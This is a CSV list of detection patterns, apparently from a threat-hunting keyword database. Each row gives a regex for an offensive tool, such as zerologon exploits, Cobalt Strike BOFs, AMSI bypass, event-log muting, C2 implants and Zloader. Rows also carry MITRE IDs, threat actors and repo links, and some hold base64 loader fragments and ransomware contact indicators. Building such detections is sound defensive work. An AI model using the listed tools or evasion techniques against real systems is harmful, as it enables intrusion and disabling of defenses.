"*zer0condition/ZeroHVCI*",".{0,1000}zer0condition\/ZeroHVCI.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","1","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","63447"
"*zeroday-powershell*",".{0,1000}zeroday\-powershell.{0,1000}","offensive_tool_keyword","zeroday-powershell","This will exploit the Windows operating system allowing you to modify the file Some.dll.","T1203 - T1574.001 - T1546.011","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/OneLogicalMyth/zeroday-powershell","1","1","N/A","N/A","N/A","4","326","86","2018-09-12T09:03:04Z","2018-09-10T16:34:14Z","63448"
"*zerologon clone *https*",".{0,1000}zerologon\sclone\s.{0,1000}https.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","63449"
"*zerologon.py*",".{0,1000}zerologon\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1071","TA0008 - TA0006","N/A","N/A","Exploitation tool","https://github.com/michaelpoznecki/zerologon","1","1","N/A","N/A","N/A","1","10","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z","63450"
"*zerologon.x64*",".{0,1000}zerologon\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","N/A","10","10","158","37","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z","63451"
"*zerologon.x86*",".{0,1000}zerologon\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","N/A","10","10","158","37","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z","63452"
"*zerologon_check*",".{0,1000}zerologon_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","63453"
"*ZeroLogon-BOF*",".{0,1000}ZeroLogon\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","N/A","10","10","158","37","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z","63454"
"*zerologon-restore * -target-ip *",".{0,1000}zerologon\-restore\s.{0,1000}\s\-target\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","63455"
"*ZeroMemoryEx/Amsi-Killer*",".{0,1000}ZeroMemoryEx\/Amsi\-Killer.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","63457"
"*ZeroMemoryEx/Blackout*",".{0,1000}ZeroMemoryEx\/Blackout.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","63458"
"*ZeroPointSecurity/BadWindowsService*",".{0,1000}ZeroPointSecurity\/BadWindowsService.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","1","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","63459"
"*ZEROSHELL | ZEROSTORE*",".{0,1000}ZEROSHELL\s\|\sZEROSTORE.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","63460"
"*zerosum0x0*",".{0,1000}zerosum0x0.{0,1000}","offensive_tool_keyword","zerosum0x0","github repo username hosting backdoors pocs and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tool","https://github.com/zerosum0x0","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","63461"
"*zerosum0x0*koadic*",".{0,1000}zerosum0x0.{0,1000}koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","63462"
"*zeze-zeze/NamedPipeMaster*",".{0,1000}zeze\-zeze\/NamedPipeMaster.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","63463"
"*ZGF0YS5mZGEuZ292*",".{0,1000}ZGF0YS5mZGEuZ292.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63464"
"*ZGIuc3NhLmdvdg==*",".{0,1000}ZGIuc3NhLmdvdg\=\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63465"
"*zha0gongz1*",".{0,1000}zha0gongz1.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","63466"
"*zha0gongz1/DesertFox*",".{0,1000}zha0gongz1\/DesertFox.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","63467"
"*Ziconius/FudgeC2*",".{0,1000}Ziconius\/FudgeC2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","63468"
"*ziiiiizzzb*",".{0,1000}ziiiiizzzb.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","63469"
"*ziiiiizzzib*",".{0,1000}ziiiiizzzib.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","63470"
"*zip2john *",".{0,1000}zip2john\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","63471"
"*ZipExec/Cryptor*",".{0,1000}ZipExec\/Cryptor.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","63472"
"*ZipExec/Loader*",".{0,1000}ZipExec\/Loader.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","63473"
"*--ZipFileName $TrustedDomain.zip*",".{0,1000}\-\-ZipFileName\s\$TrustedDomain\.zip.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","63474"
"*zippy.nim*",".{0,1000}zippy\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","63475"
"*zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion*",".{0,1000}zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63476"
"*Zloader-FCVP*",".{0,1000}Zloader\-FCVP.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","63477"
"*zMarch/Orc*",".{0,1000}zMarch\/Orc.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","1","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","63479"
"*znhsupport@protonmail.com*",".{0,1000}znhsupport\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63480"
"*ZnVuY3Rpb24gRG9udXQtTG9hZGVyIHtwYXJhbSgkcHJvY2Vzc19pZCwkZG9udXRmaWx*",".{0,1000}ZnVuY3Rpb24gRG9udXQtTG9hZGVyIHtwYXJhbSgkcHJvY2Vzc19pZCwkZG9udXRmaWx.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","#base64","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","63481"
"*ZnVuY3Rpb24gRGxsLUxvYWRlciB7CiAgICBwYXJhbShbc3dpdGNoXSRzbWIsIFtzd2l0Y*",".{0,1000}ZnVuY3Rpb24gRGxsLUxvYWRlciB7CiAgICBwYXJhbShbc3dpdGNoXSRzbWIsIFtzd2l0Y.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","#base64","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","63482"
"*ZnVuY3Rpb24gSW52b2tlLUJpbmFyeSB7cGFyYW0oJGFyZykKICAgICRoZWxwPUAi*",".{0,1000}ZnVuY3Rpb24gSW52b2tlLUJpbmFyeSB7cGFyYW0oJGFyZykKICAgICRoZWxwPUAi.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","#base64","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","63483"
"*ZnVuY3Rpb24gSW52b2tlLVNoZWxsY29kZQ0K*",".{0,1000}ZnVuY3Rpb24gSW52b2tlLVNoZWxsY29kZQ0K.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#base64","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","63484"
"*zoom1.msi.gpg*",".{0,1000}zoom1\.msi\.gpg.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","63489"
"*zoom2.dll.gpg*",".{0,1000}zoom2\.dll\.gpg.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","63490"
"*zs5460/portscan*",".{0,1000}zs5460\/portscan.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","1","N/A","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z","63507"
